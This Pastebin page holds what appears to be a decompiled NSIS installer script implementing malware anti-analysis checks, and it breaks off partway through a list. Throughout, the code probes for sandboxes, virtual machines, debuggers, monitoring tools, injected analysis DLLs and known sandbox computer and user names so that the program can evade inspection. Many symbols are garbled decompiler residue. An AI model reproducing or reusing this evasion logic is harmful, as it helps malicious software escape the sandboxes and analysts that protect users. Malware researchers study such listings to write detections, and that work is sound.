Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Push €€
- Exch
- Pop $0
- Push €
- Push ‚€
- Push ƒ€
- Push „€
- Push …€
- Push †€
- Push ‡€
- StrCpy $1 "€€,"
- StrCpy $2 "65536"
- Push 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ‚€
- RegisterDLL š€\System.dll Alloc 0
- Pop $3
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ntdll::ZwQuerySystemInformation(i 5, i ƒ€, i ‚€, i 0) i .r0
- RegisterDLL š€\System.dll Call 0
- StrCmp "€€" "0" 36 0 0
- IntCmp 74 207 0 35 35 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ƒ€
- RegisterDLL š€\System.dll Free 0
- IntOp 2 82 111 0
- Goto 14
- Goto 36
- Goto 223
- StrCpy $7 "ƒ€"
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push *ƒ€(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,.r2,,.r6,)
- RegisterDLL š€\System.dll Call 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::WideCharToMultiByte(i 0, i 0, i r2, i -1, t .r5, i 1024, i 0, i 0) i .r0
- RegisterDLL š€\System.dll Call 0
- Push €
- Push ,
- Push /…€
- Call 52
- Goto 215
- Push €
- Exch
- Pop $1
- Exch
- Push €€
- Exch
- Pop $0
- Exch
- Exch
- Push Š€
- Exch
- Pop $R0
- Exch
- Push ‚€
- Push ƒ€
- Push „€
- Push …€
- Push †€
- Push ‡€
- Push ˆ€
- Push ‰€
- Push ‹€
- Push Œ€
- SetFlag 2 117
- StrCpy $9 ""
- StrCpy $2 "€" 1
- StrCpy $1 "€" "" 1
- StrCmp "‚€" "E" 0 82 0
- StrCpy $9 "E"
- Goto 77
- StrCpy $3 ""
- StrCmp "‚€" "+" 89 0 0
- StrCmp "‚€" "-" 89 0 0
- StrCmp "‚€" "/" 102 0 0
- StrCmp "‚€" "#" 102 0 0
- StrCmp "‚€" "*" 102 0 0
- Goto 191
- StrCpy $4 "€" 1 -1
- StrCmp "„€" "*" 94 0 0
- StrCmp "„€" "}" 94 0 0
- StrCmp "„€" "{" 94 0 0
- Goto 97
- StrCpy $1 "€" -1
- StrCpy $3 "„€ƒ€"
- Goto 89
- StrCmp "ƒ€" "*" 191 0 0
- StrCmp "ƒ€" "**" 191 0 0
- StrCmp "ƒ€" "}{" 191 0 0
- IntOp 1 78 117 0
- StrCmp "€" "0" 193 0 0
- StrCmp "Š€" "" 195 0 0
- StrCpy $4 "0"
- StrCpy $5 "0"
- StrCpy $6 "0"
- Assign 7 74
- Goto 109
- IntOp 6 98 418 0
- StrCpy $8 "Š€" ‡€ †€
- StrCmp "ˆ€…€" "0" 195 0 0
- Assign 12 402
- IntCmp 414 117 114 0 0 0
- StrCmp "ˆ€" "€€" 118 108 0
- StrCmp "ƒ€" "{" 133 0 0
- StrCmp "ƒ€" "}" 133 0 0
- StrCmp "‚€" "*" 133 0 0
- StrCmp "…€" "†€" 133 122 0
- StrCmp "ƒ€" "{" 122 0 0
- StrCmp "ƒ€" "}" 122 0 0
- StrCmp "‚€" "*" 122 0 0
- StrCmp "…€" "†€" 130 0 0
- IntOp 4 90 418 0
- StrCmp "‚€„€" "+€" 144 0 0
- StrCmp "‚€" "/" 0 130 0
- IntOp 8 98 94 1
- StrCpy $8 "Š€" ˆ€ …€
- StrCmp "€" "ˆ€" 0 130 0
- StrCpy $R1 "„€"
- Goto 198
- IntOp 6 98 102 0
- StrCpy $5 "†€"
- Goto 109
- StrCmp "‚€" "-" 0 138 0
- StrCpy $2 "+"
- IntOp 1 90 78 1
- IntOp 1 78 418 0
- IntCmp 78 117 193 193 102 0
- StrCmp "‚€" "#" 0 141 0
- StrCpy $R1 "„€"
- Goto 198
- StrCmp "‚€" "*" 0 193 0
- StrCpy $R1 "„€"
- Goto 198
- StrCmp "ƒ€" "" 0 148 0
- IntOp 6 98 94 1
- StrCpy $R1 "Š€" †€ …€
- Goto 198
- StrCmp "ƒ€" "{" 0 151 0
- StrCpy $R1 "Š€" †€
- Goto 198
- StrCmp "ƒ€" "}" 0 155 0
- IntOp 6 98 102 0
- StrCpy $R1 "Š€" "" †€
- Goto 198
- StrCmp "ƒ€" "{*" 157 0 0
- StrCmp "ƒ€" "*{" 0 159 0
- StrCpy $R1 "Š€" †€
- Goto 198
- StrCmp "ƒ€" "*}" 161 0 0
- StrCmp "ƒ€" "}*" 0 163 0
- StrCpy $R1 "Š€" "" …€
- Goto 198
- StrCmp "ƒ€" "}}" 0 166 0
- StrCpy $R1 "Š€" "" †€
- Goto 198
- StrCmp "ƒ€" "{{" 0 169 0
- StrCpy $R1 "Š€" …€
- Goto 198
- StrCmp "ƒ€" "{}" 0 191 0
- Assign 3 398
- StrCmp "ƒ€" "†€" 0 174 0
- StrCpy $0 ""
- Goto 175
- IntOp 6 98 102 0
- StrCpy $8 "Š€" "" †€
- StrCmp "„€ˆ€" "1" 182 0 0
- StrCmp "„€" "1" 179 184 0
- IntOp 6 98 102 0
- StrCpy $3 "Š€" ‡€ †€
- StrCmp "ƒ€" "" 182 0 0
- StrCmp "ƒ€" "€€" 178 184 0
- StrCpy $R1 ""
- Goto 198
- StrCmp "…€" "0" 0 187 0
- StrCpy $0 ""
- Goto 188
- IntOp 5 94 102 1
- StrCpy $3 "Š€" …€
- StrCpy $R1 "ƒ€€€ˆ€"
- Goto 198
- StrCpy $R1 "3"
- Goto 196
- StrCpy $R1 "2"
- Goto 196
- StrCpy $R1 "1"
- StrCmp "‰€" "E" 0 199 0
- SetFlag 2 418
- StrCpy $R0 "‹€"
- Pop $R2
- Pop $R1
- Pop $9
- Pop $8
- Pop $7
- Pop $6
- Pop $5
- Pop $4
- Pop $3
- Pop $2
- Pop $1
- Pop $0
- Push Š€
- Exch
- Pop $R0
- Return
- Pop $0
- IntCmp 74 117 220 0 0 0
- Pop $0
- Push †€
- Goto 223
- StrCmp "„€" "0" 223 0 0
- IntOp 3 86 90 0
- Goto 37
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ‡€
- RegisterDLL š€\System.dll Free 0
- Pop $0
- Pop $7
- Pop $6
- Pop $5
- Pop $4
- Pop $3
- Pop $2
- Pop $1
- Push €€
- Exch
- Pop $0
- Return
- Push €€
- Exch
- Pop $0
- Push €
- Push ‚€
- Push ƒ€
- Push „€
- Push …€
- Push †€
- Push ‡€
- StrCpy $1 "€€"
- StrCpy $2 "65536"
- Push 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ‚€
- RegisterDLL š€\System.dll Alloc 0
- Pop $3
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ntdll::ZwQuerySystemInformation(i 5, i ƒ€, i ‚€, i 0) i .r0
- RegisterDLL š€\System.dll Call 0
- StrCmp "€€" "0" 275 0 0
- IntCmp 74 207 0 274 274 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ƒ€
- RegisterDLL š€\System.dll Free 0
- IntOp 2 82 111 0
- Goto 253
- Goto 275
- Goto 305
- StrCpy $7 "ƒ€"
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push *ƒ€(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,,,.r2,.r6)
- RegisterDLL š€\System.dll Call 0
- IntCmp 78 82 0 302 302 0
- StrCpy $1 "†€"
- StrCpy $3 "‡€"
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push *ƒ€(&i4, &i4, &i24, &i8, &i8, &i8, &i4, &i4, &i4, &i4, &i4) i i (.r4,,,,,,,.r2,,.r6,)
- RegisterDLL š€\System.dll Call 0
- IntCmp 78 98 0 298 298 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::WideCharToMultiByte(i 0, i 0, i r2, i -1, t .r5, i 1024, i 0, i 0) i .r0
- RegisterDLL š€\System.dll Call 0
- Pop $0
- Push …€
- Goto 305
- StrCmp "„€" "0" 301 0 0
- IntOp 3 86 90 0
- Goto 284
- Goto 305
- StrCmp "„€" "0" 305 0 0
- IntOp 3 86 90 0
- Goto 276
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ‡€
- RegisterDLL š€\System.dll Free 0
- Pop $0
- Pop $7
- Pop $6
- Pop $5
- Pop $4
- Pop $3
- Pop $2
- Pop $1
- Push €€
- Exch
- Pop $0
- Return
- Push Š€
- Exch
- Pop $R0
- Exch
- Push ‹€
- Exch
- Pop $R1
- Push Œ€
- Push €
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ntdll::strstr(t R1, t R0)i.R0 ?c
- RegisterDLL š€\System.dll Call 0
- Pop $R3
- Pop $R2
- Pop $R1
- Push Š€
- Exch
- Pop $R0
- Return
- Push ‹€
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::GetFileAttributes(t 'c:\cwsandbox\cwsandbox.ini')i .R0
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 702 351 0 0 0
- Goto 366
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::GetFileAttributes(t 'c:\test\vmversion.txt')i .R0
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 702 358 0 0 0
- Goto 366
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::GetFileAttributes(t 'c:\bin\AHookMonitor.dll')i .R0
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 702 365 0 0 0
- Goto 366
- Goto 368
- StrCpy $R0 "TRUE"
- Goto 369
- StrCpy $R0 "FALSE"
- Pop $R1
- Return
- Push ‹€
- Push Œ€
- Push €
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push advapi32::GetUserName(t .R0, *i 1024 R1) i.R2
- RegisterDLL š€\System.dll Call 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push User32::CharLower(t R0 R0) i
- RegisterDLL š€\System.dll Call 0
- StrCmp "Š€" "sandbox" 0 386 0
- Goto 399
- StrCmp "Š€" "vmware" 0 388 0
- Goto 399
- StrCmp "Š€" "honey" 0 390 0
- Goto 399
- StrCmp "Š€" "nepenthes" 0 392 0
- Goto 399
- StrCmp "Š€" "maltest" 0 394 0
- Goto 399
- StrCmp "Š€" "malware" 0 396 0
- Goto 399
- StrCmp "Š€" "currentuser" 0 398 0
- Goto 399
- Goto 401
- StrCpy $R0 "TRUE"
- Goto 402
- StrCpy $R0 "FALSE"
- Pop $R3
- Pop $R2
- Pop $R1
- Return
- Push ‹€
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::IsDebuggerPresent()i.R0
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 414 0 0 0
- Goto 436
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::CloseHandle(i 0)i.R0
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 421 0 0 0
- Goto 436
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::CloseHandle(i 0xDEADC0DE)i.R0
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 428 0 0 0
- Goto 436
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::CloseHandle(i 0xFEFEDEAF)i.R0
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 435 0 0 0
- Goto 436
- Goto 438
- StrCpy $R0 "TRUE"
- Goto 439
- StrCpy $R0 "FALSE"
- Pop $R1
- Return
- Push ‹€
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::GetCurrentProcessId()i.R0
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 486 0 0 0
- Push Š€
- Call 240
- Pop $R1
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push User32::CharLower(t R1 R1)i
- RegisterDLL š€\System.dll Call 0
- Push ‹€
- Push perl
- Call 322
- Pop $R0
- IntCmp 398 117 462 0 0 0
- Goto 535
- Push ‹€
- Push python
- Call 322
- Pop $R0
- IntCmp 398 117 468 0 0 0
- Goto 535
- Push ‹€
- Push autoit
- Call 322
- Pop $R0
- IntCmp 398 117 474 0 0 0
- Goto 535
- Push ‹€
- Push ollydbg
- Call 322
- Pop $R0
- IntCmp 398 117 480 0 0 0
- Goto 535
- Push ‹€
- Push immunitydebugger
- Call 322
- Pop $R0
- IntCmp 398 117 486 0 0 0
- Goto 535
- StrCpy $R1 ""
- StrCpy $R1 "‹€python.exe"
- StrCpy $R1 "‹€,perl.exe"
- StrCpy $R1 "‹€,xenservice.exe"
- StrCpy $R1 "‹€,vmtoolsd.exe"
- StrCpy $R1 "‹€,ollydbg.exe"
- StrCpy $R1 "‹€,immunitydebugger.exe"
- StrCpy $R1 "‹€,windbg.exe"
- StrCpy $R1 "‹€,syserapp.exe"
- StrCpy $R1 "‹€,x96_dbg.exe"
- StrCpy $R1 "‹€,x32_dbg.exe"
- StrCpy $R1 "‹€,x64_dbg.exe"
- StrCpy $R1 "‹€,prl_cc.exe"
- StrCpy $R1 "‹€,prl_tools.exe"
- StrCpy $R1 "‹€,vboxservice.exe"
- StrCpy $R1 "‹€,vmusrvc.exe"
- StrCpy $R1 "‹€,vmsrvc.exe"
- StrCpy $R1 "‹€,sharedintapp.exe"
- StrCpy $R1 "‹€,procexp.exe"
- StrCpy $R1 "‹€,vmware.exe"
- StrCpy $R1 "‹€,joeboxserver.exe"
- StrCpy $R1 "‹€,joeboxcontrol.exe"
- StrCpy $R1 "‹€,sniff_hit.exe"
- StrCpy $R1 "‹€,sysanalyzer.exe"
- StrCpy $R1 "‹€,regmon.exe"
- StrCpy $R1 "‹€,autoruns.exe"
- StrCpy $R1 "‹€,sandboxreboot.exe"
- StrCpy $R1 "‹€,sandboxreboot-5min.exe"
- StrCpy $R1 "‹€,systracersrv.exe"
- StrCpy $R1 "‹€,systracer.exe"
- StrCpy $R1 "‹€,tcpdump.exe"
- StrCpy $R1 "‹€,windump.exe"
- StrCpy $R1 "‹€,windbg.exe"
- StrCpy $R1 "‹€,apis32.exe"
- StrCpy $R1 "‹€,sbiesvc.exe"
- StrCpy $R1 "‹€,sandboxierpcss.exe"
- StrCpy $R1 "‹€,dumpcap.exe"
- StrCpy $R1 "‹€,zxsniffer.exe"
- StrCpy $R1 "‹€,wspass.exe"
- StrCpy $R1 "‹€,sandbox_svc.exe"
- StrCpy $R1 "‹€,a2service.exe"
- StrCpy $R1 "‹€,bullguard.exe"
- StrCpy $R1 "‹€,frwl_svc.exe"
- Push ‹€
- Call 1
- Pop $R0
- IntCmp 398 117 534 0 0 0
- Goto 535
- Goto 537
- StrCpy $R0 "TRUE"
- Goto 538
- StrCpy $R0 "FALSE"
- Pop $R1
- Return
- Push €
- Push ‚€
- Push ƒ€
- Push „€
- IntOp 4 117 117 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push (p.r1, p) iss
- RegisterDLL š€\System.dll Get 0
- Pop $R0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push user32::EnumWindows(k R0, p) i.s
- RegisterDLL š€\System.dll Call 0
- Pop $0
- StrCmp "€€" "callback1" 0 627 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push user32::GetWindowText(p r1, t.r2, i1024)
- RegisterDLL š€\System.dll Call 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push user32::GetClassName(p r1, t.r3, i1024)
- RegisterDLL š€\System.dll Call 0
- IntCmp 90 117 0 620 620 0
- StrCmp "ƒ€" "PROCEXPL" 0 571 0
- IntOp 4 90 418 0
- StrCmp "ƒ€" "PROCMON_WINDOW_CLASS" 0 573 0
- IntOp 4 90 418 0
- StrCmp "ƒ€" "VBoxTrayToolWndClass" 0 575 0
- IntOp 4 90 418 0
- StrCmp "ƒ€" "VMSwitchUserControlClass" 0 577 0
- IntOp 4 90 418 0
- StrCmp "ƒ€" "ProcessLasso_Notification_Class" 0 579 0
- IntOp 4 90 418 0
- StrCmp "ƒ€" "SmartSniff" 0 581 0
- IntOp 4 90 418 0
- StrCmp "ƒ€" "ProcessHacker" 0 583 0
- IntOp 4 90 418 0
- StrCmp "ƒ€" "CPInterceptor" 0 585 0
- IntOp 4 90 418 0
- StrCmp "ƒ€" "{0843FD01-1D28-44a3-B11D-E3A93A85EA96}" 0 587 0
- IntOp 4 90 418 0
- StrCmp "ƒ€" "SysAnalyzer" 0 589 0
- IntOp 4 90 418 0
- StrCmp "ƒ€" "CPInterceptor" 0 591 0
- IntOp 4 90 418 0
- StrCmp "ƒ€" "VMSwitchUserControlClass" 0 593 0
- IntOp 4 90 418 0
- StrCmp "ƒ€" "ProcessHacker" 0 595 0
- IntOp 4 90 418 0
- StrCmp "‚€" "0" 620 0 0
- Push ‚€
- Push - main thread
- Call 322
- Pop $0
- IntCmp 74 117 602 0 0 0
- IntOp 4 90 418 0
- Push ‚€
- Push API Monitor
- Call 322
- Pop $0
- IntCmp 74 117 608 0 0 0
- IntOp 4 90 418 0
- Push ‚€
- Push Blue Project Software SysTracer
- Call 322
- Pop $0
- IntCmp 74 117 614 0 0 0
- IntOp 4 90 418 0
- Push ‚€
- Push sysinternals
- Call 322
- Pop $0
- IntCmp 74 117 620 0 0 0
- IntOp 4 90 418 0
- Push 1
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push Š€
- RegisterDLL š€\System.dll Call 0
- Goto 556
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push Š€
- RegisterDLL š€\System.dll Free 0
- IntCmp 90 117 635 0 0 0
- StrCpy $R0 "TRUE"
- Goto 636
- StrCpy $R0 "FALSE"
- Pop $4
- Pop $3
- Pop $2
- Pop $1
- Return
- Push ‹€
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::GetModuleFileName(i 0, t .R1, i 1024)i.R0
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 0 649 649 0
- Goto 728
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push User32::CharLower(t R1 R1)i
- RegisterDLL š€\System.dll Call 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ntdll::strstr(t R1, t 'c:\t.exe')i.R0 ?c
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 661 0 0 0
- Goto 725
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ntdll::strstr(t R1, t 'c:\myapp')i.R0 ?c
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 668 0 0 0
- Goto 725
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ntdll::strstr(t R1, t 'c:\self')i.R0 ?c
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 675 0 0 0
- Goto 725
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ntdll::strstr(t R1, t 'c:\file')i.R0 ?c
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 682 0 0 0
- Goto 725
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ntdll::strstr(t R1, t 'c:\analyzer\')i.R0 ?c
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 689 0 0 0
- Goto 725
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ntdll::strstr(t R1, t 'c:\test')i.R0 ?c
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 696 0 0 0
- Goto 725
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ntdll::strstr(t R1, t 'c:\ohcbulyb.exe')i.R0 ?c
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 703 0 0 0
- Goto 725
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ntdll::strstr(t R1, t 'sample')i.R0 ?c
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 710 0 0 0
- Goto 725
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ntdll::strstr(t R1, t 'target.exe')i.R0 ?c
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 717 0 0 0
- Goto 725
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ntdll::strstr(t R1, t 'insidetm')i.R0 ?c
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 724 0 0 0
- Goto 725
- Goto 727
- StrCpy $R0 "TRUE"
- Goto 728
- StrCpy $R0 "FALSE"
- Pop $R1
- Return
- Push ‹€
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::GetCurrentProcess()p.s
- RegisterDLL š€\System.dll Call 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::IsWow64Process(ps,*i0s)
- RegisterDLL š€\System.dll Call 0
- Pop $[32]
- StrCmp " €" "0" 744 0 0
- SetFlag 12 2914
- SetFlag 2 117
- ReadRegStr 11 2147483650 2918 2980 0
- IfFlag 0 748 2 0
- StrCpy $R1 "0"
- StrCmp "‹€" "0" 750 0 0
- Goto 843
- SetFlag 2 117
- ReadRegStr 11 2147483650 2992 3025 0
- IfFlag 0 754 2 0
- StrCpy $R1 "0"
- StrCmp "‹€" "0" 774 0 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push User32::CharLower(t R1 R1)i
- RegisterDLL š€\System.dll Call 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ntdll::strstr(t R1, t 'vmware')i.R0 ?c
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 767 0 0 0
- Goto 843
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ntdll::strstr(t R1, t 'vbox')i.R0 ?c
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 774 0 0 0
- Goto 843
- SetFlag 2 117
- ReadRegStr 11 2147483650 3119 3198 0
- IfFlag 0 778 2 0
- StrCpy $R1 "0"
- StrCmp "‹€" "0" 805 0 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push User32::CharLower(t R1 R1)i
- RegisterDLL š€\System.dll Call 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ntdll::strstr(t R1, t 'vmware')i.R0 ?c
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 791 0 0 0
- Goto 843
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ntdll::strstr(t R1, t 'vbox')i.R0 ?c
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 798 0 0 0
- Goto 843
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ntdll::strstr(t R1, t 'virtual')i.R0 ?c
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 805 0 0 0
- Goto 843
- SetFlag 2 117
- ReadRegStr 11 2147483650 3257 117 0
- IfFlag 0 809 2 0
- StrCpy $R1 "0"
- StrCmp "‹€" "0" 836 0 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push User32::CharLower(t R1 R1)i
- RegisterDLL š€\System.dll Call 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ntdll::strstr(t R1, t 'vmware')i.R0 ?c
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 822 0 0 0
- Goto 843
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ntdll::strstr(t R1, t 'vbox')i.R0 ?c
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 829 0 0 0
- Goto 843
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push ntdll::strstr(t R1, t 'virtual')i.R0 ?c
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 836 0 0 0
- Goto 843
- SetFlag 2 117
- ReadRegStr 11 2147483650 3297 3332 0
- IfFlag 0 840 2 0
- StrCpy $R1 "0"
- StrCmp "‹€" "0" 842 0 0
- Goto 843
- Goto 845
- StrCpy $R0 "TRUE"
- Goto 846
- StrCpy $R0 "FALSE"
- SetFlag 12 117
- Pop $R1
- Return
- Push ‹€
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::GetModuleHandle(t 'dbghelp.dll') i.R0
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 857 0 0 0
- Goto 921
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::GetModuleHandle(t 'pstorec.dll') i.R0
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 864 0 0 0
- Goto 921
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::GetModuleHandle(t 'vmcheck.dll') i.R0
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 871 0 0 0
- Goto 921
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::GetModuleHandle(t 'api_log.dll') i.R0
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 878 0 0 0
- Goto 921
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::GetModuleHandle(t 'wpespy.dll') i.R0
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 885 0 0 0
- Goto 921
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::GetModuleHandle(t 'SbieDll.dll') i.R0
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 892 0 0 0
- Goto 921
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::GetModuleHandle(t 'dir_watch.dll') i.R0
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 899 0 0 0
- Goto 921
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::GetModuleHandle(t 'cmdvrt32.dll') i.R0
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 906 0 0 0
- Goto 921
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::LoadLibrary(t 'VBoxHook.dll') i.R0
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 913 0 0 0
- Goto 921
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::GetModuleHandle(t 'cuckoomon.dll') i.R0
- RegisterDLL š€\System.dll Call 0
- IntCmp 398 117 920 0 0 0
- Goto 921
- Goto 923
- StrCpy $R0 "TRUE"
- Goto 924
- StrCpy $R0 "FALSE"
- Pop $R1
- Return
- Push ‹€
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push kernel32::GetComputerNameA(t.R1, *i1024 R4)i.R2
- RegisterDLL š€\System.dll Call 0
- Call 1400
- File š€\System.dll
- SetFlag 13 0
- Push User32::CharLower(t R1 R1)i
- RegisterDLL š€\System.dll Call 0
- Push ‹€
- Push xteam-
- Call 322
- Pop $R0
- IntCmp 398 117 943 0 0 0
- Goto 1178
- Push ‹€
- Push vmscan-pc
- Call 322
- Pop $R0
- IntCmp 398 117 949 0 0 0
- Goto 1178
- Push ‹€
- Push brbrb-
- Call 322
- Pop $R0
- IntCmp 398 117 955 0 0 0
- Goto 1178
- Push ‹€
- Push tu-4nh09smcg1hc
- Call 322
- Pop $R0
- IntCmp 398 117 961 0 0 0
- Goto 1178
- Push ‹€
- Push antony-pc
- Call 322
- Pop $R0
- IntCmp 398 117 967 0 0 0
- Goto 1178
- Push ‹€
- Push sandbox
- Call 322
- Pop $R0
- IntCmp 398 117 973 0 0 0
- Goto 1178
- Push ‹€
- Push xp3-host
- Call 322
- Pop $0
- IntCmp 74 117 979 0 0 0
- Goto 1178
- Push ‹€
- Push win-4163c97lwca
- Call 322
- Pop $R0
- IntCmp 398 117 985 0 0 0
- Goto 1178
- Push ‹€
- Push none-dusez58jo1
- Call 322
- Pop $R0
- IntCmp 398 117 991 0 0 0
- Goto 1178
- Push ‹€
- Push ioavm
- Call 322
- Pop $R0
- IntCmp 398 117 997 0 0 0
- Goto 1178
- Push ‹€
- Push placehol-6f699a
- Call 322
- Pop $R0
- IntCmp 398 117 1003 0 0 0
- Goto 1178
- Push ‹€
- Push elvis-pc
- Call 322
- Pop $R0
- IntCmp 398 117 1009 0 0 0
- Goto 1178
- Push ‹€
- Push tequilaboomboom
- Call 322
- Pop $R0
- IntCmp 398 117 1015 0 0 0
- Goto 1178
- Push ‹€
- Push maltest
- Call 322
- Pop $R0
- IntCmp 398 117 1021 0 0 0
- Goto 1178
- Push ‹€
- Push ad-europe-
- Call 322
- Pop $R0
- IntCmp 398 117 1027 0 0 0
- Goto 1178
- Push ‹€
- Push windowshost
- Call 322
- Pop $R0
- IntCmp 398 117 1033 0 0 0
- Goto 1178
- Push ‹€
- Push wilbert-
- Call 322
- Pop $R0
- IntCmp 398 117 1039 0 0 0
- Goto 1178
- Push ‹€
- Push cws0
- Call 322
- Pop $R0
- IntCmp 398 117 1045 0 0 0
- Goto 1178
- Push ‹€
- Push cws1
- Call 322
- Pop $R0
- IntCmp 398 117 1051 0 0 0
- Goto 1178
- Push ‹€
- Push template
- Call 322
- Pop $R0
- IntCmp 398 117 1057 0 0 0
- Goto 1178
- Push ‹€
- Push cuckoo
- Call 322
- Pop $R0
- IntCmp 398 117 1063 0 0 0
- Goto 1178
- Push ‹€
- Push virtual
- Call 322
- Pop $R0
- IntCmp 398 117 1069 0 0 0
- Goto 1178
- Push ‹€
- Push rats-pc
- Call 322
- Pop $R0
- IntCmp 398 117 1075 0 0 0
- Goto 1178
- Push ‹€
- Push JOHNNYBRAVO-PC
- Call 322
- Pop $R0
- IntCmp 398 117 1081 0 0 0
- Goto 1178
- Push ‹€
- Push TEST-
- Call 322
- Pop $R0
- IntCmp 398 117 1087 0 0 0
- Goto 1178
- Push ‹€
- Push sandbox-
- Call 322
- Pop $R0
- IntCmp 398 117 1093 0 0 0
- Goto 1178
- Push ‹€
- Push ANTONY-PC
- Call 322
- Pop $R0
- IntCmp 398 117 1099 0 0 0
- Goto 1178
- Push ‹€
- Push CTP79LO-PC
- Call 322
- Pop $R0
